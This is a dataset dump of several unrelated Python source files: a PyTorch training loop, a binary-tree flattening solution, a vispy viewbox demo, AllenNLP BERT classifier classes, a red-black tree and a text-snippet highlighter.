smoothing)\n\n return loss\n\ndef cal_loss(pred, gold, smoothing):\n ''' Calculate cross entropy loss, apply label smoothing if needed. '''\n\n gold = gold.contiguous().view(-1)\n\n if smoothing:\n eps = 0.1\n n_class = pred.size(1)\n\n one_hot = torch.zeros_like(pred).scatter(1, gold.view(-1, 1), 1)\n one_hot = one_hot * (1 - eps) + (1 - one_hot) * eps / (n_class - 1)\n log_prb = F.log_softmax(pred, dim=1)\n\n loss = -(one_hot * log_prb).sum(dim=1)\n loss = loss.sum() # average later\n else:\n loss = F.cross_entropy(pred, gold, reduction='sum')\n\n return loss\n\ndef train_epoch(model, training_data, optimizer, device, smoothing):\n ''' Epoch operation in training phase'''\n\n model.train()\n\n total_loss = 0\n n_count = 0\n prediction = []\n label = []\n\n for step, (eod, gt) in enumerate(training_data):\n\n # prepare data\n Eod, Gt = eod.to(device), gt.to(device)\n\n # forward\n optimizer.zero_grad()\n pred = model(Eod)\n\n # backward\n loss = cal_performance(pred, Gt, smoothing=smoothing)\n loss.backward()\n\n # update parameters\n optimizer.step_and_update_lr()\n # optimizer.step()\n\n # note keeping\n total_loss += loss.item()\n n_count += Eod.size(0) * Eod.size(1)\n\n pred = pred.max(1)[1]\n gold = Gt.contiguous().view(-1)\n\n pred = np.array(pred.cpu())\n gold = np.array(gold.cpu())\n\n length = len(pred)\n for i in range(length):\n prediction.append(pred[i])\n label.append(gold[i])\n\n epoch_loss = total_loss / n_count\n accuracy = 100 * accuracy_score(label, prediction)\n precision = 100 * precision_score(label, prediction, average='macro')\n recall = 100 * recall_score(label, prediction, average='macro')\n f1 = 100 * f1_score(label, prediction, average='macro')\n\n return epoch_loss, accuracy, precision, recall, f1\n\ndef eval_epoch(model, validation_data, device):\n ''' Epoch operation in evaluation phase '''\n\n model.eval()\n\n total_loss = 0\n n_count = 0\n prediction = []\n label = []\n\n with torch.no_grad():\n for step, (eod, gt) in enumerate(validation_data):\n\n # prepare data\n Eod, Gt = eod.to(device), gt.to(device)\n\n # forward\n pred = model(Eod)\n loss = cal_performance(pred, Gt, smoothing=False)\n\n # note keeping\n total_loss += loss.item()\n n_count += Eod.size(0) * Eod.size(1)\n\n pred = pred.max(1)[1]\n gold = Gt.contiguous().view(-1)\n\n pred = np.array(pred.cpu())\n gold = np.array(gold.cpu())\n\n length = len(pred)\n for i in range(length):\n prediction.append(pred[i])\n label.append(gold[i])\n\n epoch_loss = total_loss / n_count\n accuracy = 100 * accuracy_score(label, prediction)\n precision = 100 * precision_score(label, prediction, average='macro')\n recall = 100 * recall_score(label, prediction, average='macro')\n f1 = 100 * f1_score(label, prediction, average='macro')\n\n return epoch_loss, accuracy, precision, recall, f1\n\n\ndef train(model, training_data, validation_data, optimizer, device, args):\n ''' Start training '''\n\n log_train_file = None\n log_valid_file = None\n\n if args.log:\n log_train_file = args.log + '.train.log'\n log_valid_file = args.log + '.valid.log'\n\n print('[Info] Training performance will be written to file: {} and {}'.format(\n log_train_file, log_valid_file))\n\n with open(log_train_file, 'w') as log_tf, open(log_valid_file, 'w') as log_vf:\n log_tf.write('epoch, loss, accuracy, precision, recall, f1\\n')\n log_vf.write('epoch, loss, accuracy, precision, recall, f1\\n')\n\n writer = SummaryWriter(comment=args.log[7:])\n\n valid_accus = []\n for epoch_i in range(args.epoch):\n print('[ Epoch', epoch_i, ']')\n\n start = time.time()\n train_loss, train_accu, train_mp, train_mr, train_f1 = train_epoch(\n model, training_data, optimizer, device, smoothing=args.label_smoothing)\n print(' - (Training) loss: {loss: 8.5f}, accuracy: {accu:3.2f} %, '\n 'precision: {mp: 3.2f} %, recall: {mr: 3.2f} %, f1: {f1: 3.2f} % ' \\\n 'elapse: {elapse:3.3f} min'.format(\n loss=train_loss, accu=train_accu, mp=train_mp, mr=train_mr, f1=train_f1,\n elapse=(time.time() - start) / 60))\n\n writer.add_scalar('scalar/loss_train', train_loss, epoch_i + 1)\n writer.add_scalar('scalar/acc_train', train_accu, epoch_i + 1)\n writer.add_scalar('scalar/mp_train', train_mp, epoch_i + 1)\n writer.add_scalar('scalar/mr_train', train_mr, epoch_i + 1)\n writer.add_scalar('scalar/f1_train', train_f1, epoch_i + 1)\n\n\n start = time.time()\n valid_loss, valid_accu, valid_mp, valid_mr, valid_f1 = eval_epoch(model, validation_data, device)\n print(' - (validation) loss: {loss: 8.5f}, accuracy: {accu:3.2f} %, '\n 'precision: {mp: 3.2f} %, recall: {mr: 3.2f} %, f1: {f1: 3.2f} % ' \\\n 'elapse: {elapse:3.3f} min'.format(\n loss=valid_loss, accu=valid_accu, mp=valid_mp, mr=valid_mr, f1=valid_f1,\n elapse=(time.time() - start) / 60))\n\n writer.add_scalar('scalar/loss_valid', valid_loss, epoch_i + 1)\n writer.add_scalar('scalar/acc_valid', valid_accu, epoch_i + 1)\n writer.add_scalar('scalar/mp_valid', valid_mp, epoch_i + 1)\n writer.add_scalar('scalar/mr_valid', valid_mr, epoch_i + 1)\n writer.add_scalar('scalar/f1_valid', valid_f1, epoch_i + 1)\n\n valid_accus += [valid_accu]\n\n model_state_dict = model.state_dict()\n checkpoint = {\n 'model': model_state_dict,\n 'settings': args,\n 'epoch': epoch_i}\n\n if args.save_model:\n if args.save_mode == 'all':\n model_name = args.save_model + '_accu_{accu:3.2f}.chkpt'.format(accu=valid_accu)\n torch.save(checkpoint, model_name)\n elif args.save_mode == 'best':\n model_name = args.save_model + '.chkpt'\n if valid_accu >= max(valid_accus):\n torch.save(checkpoint, model_name)\n print(' - [Info] The checkpoint file has been updated.')\n\n if log_train_file and log_valid_file:\n with open(log_train_file, 'a') as log_tf, open(log_valid_file, 'a') as log_vf:\n log_tf.write('{epoch: 4.0f},{loss: 8.5f},{accu: 3.2f},{mp: 3.2f},{mr: 3.2f},{f1: 3.2f}\\n'.format(\n epoch=epoch_i, loss=train_loss, accu=train_accu, mp=train_mp, mr=train_mr, f1=train_f1))\n log_vf.write('{epoch: 4.0f},{loss: 8.5f},{accu: 3.2f},{mp: 3.2f},{mr: 3.2f},{f1: 3.2f}\\n'.format(\n epoch=epoch_i, loss=valid_loss, accu=valid_accu, mp=valid_mp, mr=valid_mr, f1=valid_f1))\n\n writer.close()\n\n if log_valid_file:\n with open(log_valid_file, 'a') as log_vf:\n log_vf.write('{Best:3.2f}\\n'.format(Best=max(valid_accus)))\n\ndef prepare_dataloaders(eod_data, gt_data, args):\n # ========= Preparing DataLoader =========#\n EOD, GT = [], []\n for i in range(eod_data.shape[1] - args.length - 1):\n eod, gt = get_batch(eod_data, gt_data, i, args.length)\n EOD.append(eod)\n GT.append(gt)\n\n train_eod, train_gt = EOD[:args.train_index], GT[:args.train_index]\n valid_eod, valid_gt = EOD[args.train_index:], GT[args.train_index:]\n\n # ========= debug =========#\n # train1, train2, train3 = 0,0,0\n # test1, test2, test3 = 0,0,0\n # for i in train_gt:\n # for j in i:\n # if j==0:\n # train1+=1\n # elif j==1:\n # train2+=1\n # else:\n # train3+=1\n #\n # for i in valid_gt:\n # for j in i:\n # if j==0:\n # test1+=1\n # elif j==1:\n # test2+=1\n # else:\n # test3+=1\n #\n # trains = train1+train2+train3\n # tests = test1+test2+test3\n # print(train1/trains, train2/trains, train3/trains)\n # print(test1/tests, test2/tests, test3/tests)\n # exit()\n\n train_eod, valid_eod = torch.FloatTensor(train_eod), torch.FloatTensor(valid_eod)\n train_gt, valid_gt = torch.LongTensor(train_gt), torch.LongTensor(valid_gt)\n\n print(train_eod.shape, valid_eod.shape)\n print(train_gt.shape, valid_gt.shape)\n\n train_dataset = Data.TensorDataset(train_eod, train_gt)\n valid_dataset = Data.TensorDataset(valid_eod, valid_gt)\n\n train_loader = Data.DataLoader(dataset=train_dataset, batch_size=args.batch_size, shuffle=True)\n valid_loader = Data.DataLoader(dataset=valid_dataset, batch_size=args.batch_size)\n\n return train_loader, valid_loader\n\ndef prepare_dataloaders_(eod_data, gt_data, args):\n # ========= Preparing DataLoader =========#\n EOD, GT = [], []\n for i in range(eod_data.shape[1] - args.length - args.steps - 1):\n eod, gt = get_batch(eod_data, gt_data, i, args.length)\n EOD.append(eod)\n GT.append(gt)\n\n train_eod, train_gt = EOD[:args.train_index], GT[:args.train_index]\n valid_eod, valid_gt = EOD[args.train_index:], GT[args.train_index:]\n\n # ========= debug =========#\n # train1, train2, train3 = 0,0,0\n # test1, test2, test3 = 0,0,0\n # for i in train_gt:\n # for j in i:\n # if j==0:\n # train1+=1\n # elif j==1:\n # train2+=1\n # else:\n # train3+=1\n #\n # for i in valid_gt:\n # for j in i:\n # if j==0:\n # test1+=1\n # elif j==1:\n # test2+=1\n # else:\n # test3+=1\n #\n # trains = train1+train2+train3\n # tests = test1+test2+test3\n # print(train1/trains, train2/trains, train3/trains)\n # print(test1/tests, test2/tests, test3/tests)\n # exit()\n\n train_eod, valid_eod = torch.FloatTensor(train_eod), torch.FloatTensor(valid_eod)\n train_gt, valid_gt = torch.LongTensor(train_gt), torch.LongTensor(valid_gt)\n\n print(train_eod.shape, valid_eod.shape)\n print(train_gt.shape, valid_gt.shape)\n\n train_dataset = Data.TensorDataset(train_eod, train_gt)\n valid_dataset = Data.TensorDataset(valid_eod, valid_gt)\n\n train_loader = Data.DataLoader(dataset=train_dataset, batch_size=args.batch_size, shuffle=True)\n valid_loader = Data.DataLoader(dataset=valid_dataset, batch_size=args.batch_size)\n\n return train_loader, valid_loader","sub_path":"training/tool.py","file_name":"tool.py","file_ext":"py","file_size_in_byte":11125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"548623568","text":"class Solution(object):\n def flatten(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: void Do not return anything, modify root in-place instead.\n \"\"\"\n res = []\n if not root: return root\n self.preorder(root, res)\n cur = head = res[0]\n for i in range(1, len(res)):\n cur.left = None\n cur.right = res[i]\n cur = res[i]\n\n def preorder(self, root, res):\n cur = root\n res.append(cur)\n if cur.left: self.preorder(cur.left, res)\n if cur.right: self.preorder(cur.right, res)","sub_path":"100-200/114_flatten_bin_tree_to_list.py","file_name":"114_flatten_bin_tree_to_list.py","file_ext":"py","file_size_in_byte":593,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"598365365","text":"\"\"\"\nSimple test of stacking viewboxes, demonstrating the three methods that\ncan be used by a viewbox to provide clipping.\n\nThere is one root scene with an NDC camera. It contains two viewboxes.\nOne with an NDC camera on the left, and one with a pixel camera on the\nright. Each of these viewboxes contains again two viewboxes. One with\nndc camera at the bottom, and one with a pixel camera at the top.\n\nUse the global PREFER_PIXEL_GRID variables to set the clipping method\nfor the two toplevel and four leaf viewbox, respectively. You can also\nmanyally set the preferred_clip_method property of one or more viewboxes.\n\nThis is what it should look like:\n\nThe line in pixel coordinates is normally expected to have the marker\nup (since the y-axis points down). The line in 2D unit coordinates is\nnormally expected to have the marker down (since the y-axis is up). But\npositioning a Viewbox is a UnitCamera2 will make it upside down.\n\n vb1 uses NormalCamera vb2 uses PixelCamera\n so contents are upside-down so contents are correct\n_______________________________________________________________\n| | |\n| long line with marker down | short line with marker down |\n|_______________________________|_______________________________|\n| | |\n| short line with marker up | long line with marker up |\n|_______________________________|_______________________________|\n\n\"\"\"\n\nimport numpy as np\n\nfrom vispy import app\nfrom vispy import scene\n\n#gloo.gl.use('desktop debug')\n\n# <<< Change method here\n# With the none method you can see the absence of clipping.\n# With the fbo method you can see the texture interpolation (induced by\n# a delibirate mismatch in screen and textue resolution)\n# Try different combinarions, like a viewport in an fbo\nPREFER_PIXEL_GRID1 = 'viewport' # none, viewport, fbo (fragment to come)\nPREFER_PIXEL_GRID2 = 'fbo'\n\n\n# Create lines for use in ndc and pixel coordinates\nN = 1000\ncolor = np.ones((N, 4), dtype=np.float32)\ncolor[:, 0] = np.linspace(0, 1, N)\ncolor[:, 1] = color[::-1, 0]\npos = np.empty((N, 2), np.float32)\n#\npos[:, 0] = np.linspace(-1., 1., N)\npos[:, 1] = np.random.normal(0.0, 0.5, size=N)\npos[:20, 1] = -0.5 # So we can see which side is down\nline_ndc = scene.visuals.Line(pos=pos.copy(), color=color)\n#\npos[:, 0] = np.linspace(50, 350., N)\npos[:, 1] = 150 + pos[:, 1] * 50\npos[:20, 1] = 100 # So we can see which side is down\nline_pixels = scene.visuals.Line(pos=pos.copy(), color=color)\n\n# Create canvas\ncanvas = scene.SceneCanvas(size=(800, 600), show=True, close_keys='escape')\ncanvas.scene.camera = scene.cameras.PixelCamera()\n\n# Create viewboxes left ...\n\nw, h = canvas.size\nw2 = w / 2.\nh2 = h / 2.\n\nvb1 = scene.ViewBox(canvas.scene, name='vb1', margin=2, border=(1, 0, 0, 1))\nvb1.pos = 0, 0\nvb1.size = w2, h\nvb1.scene.camera = scene.cameras.Fixed2DCamera(fovx=(-1, 1))\n#\nvb11 = scene.ViewBox(vb1.scene, name='vb11', margin=0.02, border=(0, 1, 0, 1))\nvb11.pos = -1.0, -1.0\nvb11.size = 2.0, 1.0\nvb11.scene.camera = scene.cameras.TwoDCamera()\nvb11.scene.camera.transform.scale = (2., 2.)\n#\nvb12 = scene.ViewBox(vb1.scene, name='vb12', margin=0.02, border=(0, 0, 1, 1))\nvb12.pos = -1.0, 0.0\nvb12.size = 2.0, 1.0\nvb12.scene.camera = scene.cameras.PixelCamera()\n#vb12.scene.camera.scale = (100, 100)\n#\nline_ndc.add_parent(vb11.scene)\nline_pixels.add_parent(vb12.scene)\n\nbox = np.array([[0, 0], [0, 1], [1, 1], [1, 0], [0, 0]], dtype=np.float32)\nunit_box = scene.visuals.Line(pos=box, color=(1, 0, 0, 1), name='unit box')\nnd_box = scene.visuals.Line(pos=box*2-1, color=(0, 1, 0, 1), name='nd box')\nvb11.add(unit_box)\nvb11.add(nd_box)\n\n# Create viewboxes right ...\n\nvb2 = scene.ViewBox(canvas.scene, name='vb2', margin=2, border=(1, 1, 0, 1))\nvb2.pos = w2, 0\nvb2.size = w2, h\nvb2.scene.camera = scene.cameras.PixelCamera()\n#\nvb21 = scene.ViewBox(vb2.scene, name='vb21', margin=10, border=(1, 0, 1, 1))\nvb21.pos = 0, 0\nvb21.size = 400, 300\nvb21.scene.camera = scene.cameras.TwoDCamera()\nvb21.scene.camera.transform.scale = (2., 2.)\n#\nvb22 = scene.ViewBox(vb2.scene, name='vb22', margin=10, border=(0, 1, 1, 1))\nvb22.pos = 0, 300\nvb22.size = 400, 300\nvb22.scene.camera = scene.cameras.PixelCamera()\n#\nline_ndc.add_parent(vb21.scene)\nline_pixels.add_parent(vb22.scene)\n\n# Set preferred pixel grid method\nfor vb in [vb1, vb2]:\n vb.preferred_clip_method = PREFER_PIXEL_GRID1\nfor vb in [vb11, vb12, vb21, vb22]:\n vb.preferred_clip_method = PREFER_PIXEL_GRID2\n\n\n# For testing/dev\nvb1._name = 'vb1'\nvb11._name = 'vb11'\nvb12._name = 'vb12'\nvb2._name = 'vb2'\nvb21._name = 'vb21'\nvb22._name = 'vb22'\n\n\nif __name__ == '__main__':\n app.run()\n","sub_path":"examples/scene/viewbox.py","file_name":"viewbox.py","file_ext":"py","file_size_in_byte":4718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"146149179","text":"from typing import Dict, Optional\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nimport numpy as np\n\nfrom overrides import overrides\nfrom allennlp.models import Model\nfrom allennlp.nn.util import get_text_field_mask\nfrom allennlp.training.metrics import CategoricalAccuracy\nfrom allennlp.modules.seq2vec_encoders import Seq2VecEncoder\nfrom allennlp.modules.text_field_embedders import TextFieldEmbedder\n\n\nclass BertSentencePooler(Seq2VecEncoder):\n\n def __init__(self, vocab, embedding_dim):\n super().__init__()\n self.vocab = vocab\n self.embedding_dim = embedding_dim\n\n\n def forward(self, embs, mask=None):\n # extract first token tensor\n return embs[:, 0]\n \n @overrides\n def get_output_dim(self) -> int:\n return self.embedding_dim \n\n\nclass Conv2dEncoderConfig:\n # Block0\n in_channels0 = 1\n out_channels0 = 100\n kernel_size0 = 3\n pool_size0 = 100\n # Block1\n in_channels1 = 100\n out_channels1 = 100\n kernel_size1 = 4\n pool_size1 = 100\n # Block2\n in_channels2 = 100\n out_channels2 = 1\n kernel_size2 = 5\n pool_size2 = 10\n\n\nclass ConvBlock(nn.Sequential):\n\n def __init__(self, in_channels, out_channels, kernel_size, pool_size, dropout=0.2):\n super(ConvBlock, self).__init__()\n self.add_module('conv2d', nn.Conv2d(in_channels, out_channels, kernel_size))\n self.add_module('relu', nn.ReLU(inplace=True))\n self.add_module('adaptive_maxpool', nn.AdaptiveMaxPool2d(pool_size))\n self.add_module('dropout', nn.Dropout(p=dropout))\n\n def forward(self, x):\n return super(ConvBlock, self).forward(x)\n\n\nclass Conv2dEncoder(Seq2VecEncoder):\n\n def __init__(self, config=Conv2dEncoderConfig()):\n super().__init__()\n self.conf = config\n self.block0 = ConvBlock(\n self.conf.in_channels0, \n self.conf.out_channels0, \n self.conf.kernel_size0, \n self.conf.pool_size0\n )\n self.block1 = ConvBlock(\n self.conf.in_channels1, \n self.conf.out_channels1, \n self.conf.kernel_size1, \n self.conf.pool_size1\n )\n self.block1 = ConvBlock(\n self.conf.in_channels2, \n self.conf.out_channels2, \n self.conf.kernel_size2, \n self.conf.pool_size2\n )\n\n def forward(self, x):\n print_shape('x input encoder', x)\n x = self.block0(x)\n print_shape('block 0 out', x)\n x = self.block1(x)\n print_shape('block 1 out', x)\n x = self.block2(x)\n return x\n\n @overrides\n def get_output_dim(self) -> int:\n return self.conf.pool_size2**2 \n\n\nclass BertModel2D(Model):\n\n def __init__(self, word_embeddings, vocab, bertpooler, encoder, n_classes):\n super().__init__(vocab)\n self.word_embeddings = word_embeddings\n self.bertpooler = bertpooler\n self.encoder = encoder \n self.projection = nn.Linear(self.encoder.get_output_dim(), n_classes)\n self.criterion = nn.CrossEntropyLoss()\n self.accuracy = CategoricalAccuracy()\n\n def forward(self, tokens, id, label):\n mask = get_text_field_mask(tokens)\n embeddings = self.word_embeddings(tokens)\n state = self.bertpooler(embeddings, mask)\n print_shape('state prior', state) \n state = torch.unsqueeze(state, 1)\n print_shape('shape post', state)\n features = self.encoder(state)\n features = features.view(features.size(0), -1)\n logits = self.projection(features)\n output = {\"class_logits\": logits}\n\n if label is not None:\n self.accuracy(logits, label)\n output[\"loss\"] = self.criterion(logits, label.long())\n\n return output\n\n def get_metrics(self, reset=False):\n return {\"accuracy\": self.accuracy.get_metric(reset)}\n\n @overrides\n def decode(self, output_dict: Dict[str, torch.Tensor]) -> Dict[str, torch.Tensor]:\n \"\"\"\n Does a simple argmax over the class probabilities, converts indices to string labels, and\n adds a ``\"label\"`` key to the dictionary with the result.\n \"\"\"\n class_probabilities = F.softmax(output_dict['logits'], dim=-1)\n output_dict['class_probabilities'] = class_probabilities\n\n predictions = class_probabilities.cpu().data.numpy()\n argmax_indices = np.argmax(predictions, axis=-1)\n labels = [self.vocab.get_token_from_index(x, namespace=\"labels\")\n for x in argmax_indices]\n output_dict['label'] = labels\n return output_dict\n\n\ndef print_shape(name, x):\n print(f'{name} has shape {x.shape}')","sub_path":"scene/ml/models/bert.py","file_name":"bert.py","file_ext":"py","file_size_in_byte":4681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"392662514","text":"class Node:\n RED = True\n BLACK = False\n\n def __init__(self, id: int, key, color: bool = RED):\n self.color = color\n self.key = key\n self.left = self.right = self.parent = NilNode.instance()\n self.id = id\n\n def __str__(self, level: int = 0, indent: str = \" \") -> str:\n left_id = \"Nil\" if not self.left else self.left.id\n right_id = \"Nil\" if not self.right else self.right.id\n parent_id = \"Nil\" if not self.parent else self.parent.id\n return f\"Node(id={self.id}, parent={parent_id}, left={left_id}, right={right_id}, red={self.color})\"\n\n def __nonzero__(self):\n return True\n\n def __bool__(self):\n return True\n\n def is_red(self) -> bool:\n return self.color == Node.RED\n\n\nclass NilNode(Node):\n __instance__ = None\n\n @classmethod\n def instance(self):\n if self.__instance__ is None:\n self.__instance__ = NilNode()\n return self.__instance__\n\n def __init__(self):\n self.color = Node.BLACK\n self.key = None\n self.left = self.right = self.parent = None\n\n def __nonzero__(self):\n return False\n\n def __bool__(self):\n return False\n\n def is_red(self) -> bool:\n return False\n\nclass BinarySearchTree:\n def __init__(self):\n self.root = NilNode.instance()\n self.size = 0\n self.control = {}\n\n def __str__helper(self, node: Node, level: int = 0, indent: str = \" \"):\n s = level * indent + str(node)\n if node.left:\n s += \"\\n\" + self.__str__helper(node.left, level + 1, indent)\n if node.right:\n s += \"\\n\" + self.__str__helper(node.right, level + 1, indent)\n return s\n\n def __str__(self, indent: str = \" \"):\n if not self.root:\n return \"(root.size = 0, balanced = True)\\n(Empty tree)\"\n res, _ = self.is_rbt()\n return f\"(root.size = {self.size}, RBT = {res})\\n\" + \\\n self.__str__helper(self.root, indent=indent)\n\n def is_empty(self) -> bool:\n return bool(self.root)\n\n def insert(self, id: int, key):\n new_node = Node(id, key)\n self.control[new_node.id] = new_node\n self.root = self.__insert(self.root, new_node)\n self.root.parent = NilNode.instance()\n self.__insert_balance(new_node)\n self.size += 1\n\n res, err = self.is_rbt()\n if not res:\n print(str(self))\n raise Exception(err)\n\n def __insert(self, act_node, new_node: Node) -> Node:\n if not act_node:\n return new_node\n\n if new_node.key < act_node.key:\n act_node.left = self.__insert(act_node.left, new_node)\n act_node.left.parent = act_node\n else:\n act_node.right = self.__insert(act_node.right, new_node)\n act_node.right.parent = act_node\n\n return act_node\n\n def __insert_balance(self, node: Node):\n while node != self.root and node.parent.is_red():\n parent = node.parent\n if parent == parent.parent.left:\n uncle = parent.parent.right\n if uncle and uncle.is_red():\n node = parent.parent\n self.__flip_colors(node)\n else:\n if node == parent.right:\n node = parent\n self.__rotate_left(node)\n self.__rotate_right(node.parent.parent)\n else:\n uncle = parent.parent.left\n if uncle and uncle.is_red():\n node = parent.parent\n self.__flip_colors(node)\n else:\n if node == parent.left:\n node = parent\n self.__rotate_right(node)\n self.__rotate_left(node.parent.parent)\n self.root.color = Node.BLACK\n\n def delete(self, id: int) -> Node:\n if not (id in self.control):\n return\n\n old = self.control[id]\n del self.control[id]\n\n if old.left and old.right:\n new_old = self.__successor(old)\n old.key = new_old.key\n old.id = new_old.id\n self.control[old.id] = old\n old = new_old\n\n child = old.right if not old.left else old.left\n child.parent = old.parent\n if old == old.parent.left:\n old.parent.left = child\n elif old == old.parent.right:\n old.parent.right = child\n else:\n self.root = child\n\n if not old.is_red():\n if child.is_red():\n child.color = Node.BLACK\n else:\n self.__delete_balance(child)\n\n self.size -= 1\n\n res, err = self.is_rbt()\n if not res:\n print(str(self))\n raise Exception(err)\n return old\n\n def __delete_balance(self, node):\n if self.root == node or node.is_red():\n node.color = Node.BLACK\n return\n left = (node == node.parent.left)\n parent = node.parent\n sibling = node.parent.right if left else node.parent.left\n if sibling.is_red():\n if left:\n self.__rotate_left(parent)\n sibling = parent.right\n else:\n self.__rotate_right(parent)\n sibling = parent.left\n if not sibling.right.is_red() and not sibling.left.is_red():\n sibling.color = Node.RED\n self.__delete_balance(parent)\n else:\n if left:\n if not sibling.right.is_red():\n self.__rotate_right(sibling)\n sibling = parent.right\n self.__rotate_left(parent)\n else:\n if not sibling.left.is_red():\n self.__rotate_left(sibling)\n sibling = parent.left\n self.__rotate_right(parent)\n sibling.left.color = Node.BLACK\n sibling.right.color = Node.BLACK\n\n def minimum(self, node = None):\n if node is None: node = self.root\n while node.left:\n node = node.left\n return node\n\n def maximum(self, node = None):\n if node is None: node = self.root\n while node.right:\n node = node.right\n return node\n\n def __successor(self, node: Node):\n if node.right:\n return self.minimum(node.right)\n parent = node.parent\n while parent and node == parent.right:\n node, parent = parent, parent.parent\n return parent\n\n def __rotate_right(self, node: Node):\n child = node.left\n node.left = child.right\n child.right = node\n child.color = child.right.color\n child.right.color = Node.RED\n child.parent = node.parent\n node.parent = child\n if node.left: node.left.parent = node\n if child.parent.left == node:\n child.parent.left = child\n elif child.parent.right == node:\n child.parent.right = child\n else:\n self.root = child\n\n def __rotate_left(self, node: Node):\n child = node.right\n node.right = child.left\n child.left = node\n child.color = child.left.color\n child.left.color = Node.RED\n child.parent = node.parent\n node.parent = child\n if node.right: node.right.parent = node\n if child.parent.left == node:\n child.parent.left = child\n elif child.parent.right == node:\n child.parent.right = child\n else:\n self.root = child\n\n def __flip_colors(self, node: Node):\n node.color = not node.color\n node.left.color = not node.left.color\n node.right.color = not node.right.color\n\n def is_rbt(self) -> tuple:\n if not self.root:\n return (True, \"\")\n node = self.root\n final_blacks = 1\n while node:\n node = node.right\n if not node.is_red():\n final_blacks += 1\n errors, ids = self.__is_rbt(self.root, 0, final_blacks)\n if errors == 0:\n return (True, \"\")\n elif errors == 1:\n return (False, f\"Tree is not balanced on ids {ids}\")\n elif errors == 2:\n return (False, f\"Tree has double red nodes on ids {ids}\")\n return (False, f\"Tree is not balanced and has double red nodes on ids {ids}\")\n\n def __is_rbt(self, node, blacks: int, final_blacks: int):\n if not node.is_red():\n blacks += 1\n elif node.left.is_red() or node.right.is_red():\n return (2, [node.id])\n if not node:\n return (0, []) if blacks == final_blacks else (1, [-1])\n lerr, lids = self.__is_rbt(node.left, blacks, final_blacks)\n rerr, rids = self.__is_rbt(node.right, blacks, final_blacks)\n if lerr != 0 and rerr != 0:\n return (lerr ^ rerr, lids + rids)\n if lerr != 0:\n return (lerr, lids)\n if rerr != 0:\n return (rerr, rids)\n return (0, [])\n","sub_path":"geocomp/point_visibility/binary_search_tree.py","file_name":"binary_search_tree.py","file_ext":"py","file_size_in_byte":9081,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"237844603","text":"#/usr/bin/python\n# -*- coding: utf-8 -*-\ndef parse_document(filename):\n \"\"\"\n Args:\n filename - filename of document to parse\n \n Returns:\n doc - A string for further analysis\n \"\"\"\n with open(filename) as document:\n for doc in document:\n return doc\n \ndef split_document_on_delimiter(input_doc,**kwargs):\n \"\"\"\n Args:\n input_doc - the string of the document in its entirety\n **kwargs:\n delimter - How to split the string\n default delimiter is '.'\n \n Returns:\n doc - array of strings split upon the specified delimiter\n \n \"\"\"\n doc = []\n if kwargs:\n if 'delimiter' in kwargs:\n delim = kwargs['delimiter']\n else:\n delim = \".\"\n \n for ele in input_doc.split(delim):\n if ele:\n doc.append(ele.lstrip())\n return doc\n\ndef find_matches_per_sentence(split_sentence,query):\n \"\"\"\n Args:\n split_sentence - A split sentence with sub strings to check with query\n query - A query split to check if it is substring of the sentence.\n \n Returns:\n sentence_array - Returns the split sentence with highlighting if a query word is found.\n \n \"\"\"\n ##split the sentence and query strings to interate over\n ##also make all words in the query lowercase to make matching words case insenstive.\n split_queries = query.split()\n split_queries = [ele.lower() for ele in split_queries]\n sentence_array = []\n\n counter = 0\n for i,word in enumerate(split_sentence):\n if word.lower() in split_queries:\n sentence_array.append(word)\n counter+=1\n if counter==1:\n sentence_array.insert(-1,\"[[HIGHLIGHT]]\")\n else:\n sentence_array.append(word)\n\n if counter!=0:\n sentence_array.insert(-1,\"[[ENDHIGHLIGHT]]\")\n counter = 0\n \n ##To check if the last word is a query word we use the counter as \n ##a descriminant i.e. counter = 0 implies last word was not in the query set\n ##so we don't add a final ENDHIGHLIGHT. \n if counter!=0:\n sentence_array.append(\"[[ENDHIGHLIGHT]]\")\n\n return sentence_array\n \ndef highlight_doc(input_doc,query,**kwargs):\n \"\"\"\n highlight_doc(args,kwargs)\n Analysises a document looking for query words and highlights them. At the moment \n the code is not smart with respect to standard connecting words such as e.g. \"a\" \"and\",\"the\" etc\n and will highlight them as singles i.e. blah [[HIGHLIGHT]] a [[ENDHIGHLIGHT]] blah.\n \n Args:\n input_doc - Document to be highlight \n query - The search query (string) \n \n Options:\n output_length - maximum length of the snippet. This is an upper limit unless there is \n an open highlighting token present i.e. \"[[HIGHLIGHT]] query1 query2 [[ENDHIGHLIGHT]]\"\n will always result in \"[[HIGHLIGHT]] query1 query2 [[ENDHIGHLIGHT]]\"\n \n Returns:\n The most relevant snippet with the query terms highlighted (string)\n \"\"\" \n \n ##set default word_output_limit if defined in the options then we overide this ##value\n word_limit_of_snippet = 34\n source_type = False\n if kwargs:\n if \"output_length\" in kwargs:\n word_limit_of_snippet = kwargs[\"output_length\"]\n if \"source_type\" in kwargs:\n source_type = kwargs[\"source_type\"]\n \n ##If text file is provided then we have to process the txt file to a string for ##processing.\n if source_type:\n input_doc = parse_document(input_doc)\n \n doc = split_document_on_delimiter(input_doc,delimiter=\".\")\n \n \"\"\"\n Intialise the various counters and booleans for ensuring the correct snippet lengths and \n heuristics for the snippet.\n \"\"\"\n number_of_words_in_snippet = total_ouput_length = 0\n first_sentence_with_match = False\n highlight_process_flag = True\n snippet = \"\"\n \n for sentence in doc:\n split_sentence = sentence.split()\n processed_sentence = find_matches_per_sentence(split_sentence,query)\n length_of_intial_sentence = len(split_sentence)\n length_of_processed_sentence = len(processed_sentence)\n \n #check that the snippet length is less than defined snippet output length.\n if total_ouput_length + length_of_processed_sentence <=word_limit_of_snippet:\n if length_of_processed_sentence>length_of_intial_sentence:\n first_sentence_with_match = True\n snippet+= \" \".join(processed_sentence)\n snippet+=\". \"\n total_ouput_length+=length_of_processed_sentence\n else:\n for i,word in enumerate(processed_sentence):\n #since python is 0 index language we need to +1 to make sure that the length of \n #snippet computes correctly.\n i+=1\n if word == \"[[HIGHLIGHT]]\":\n highlight_process_flag = True\n if word == \"[[ENDHIGHLIGHT]]\":\n highlight_process_flag = False\n if i+total_ouput_length DR4')\n\ndef fileExists(file):\n if os.path.exists(file):\n 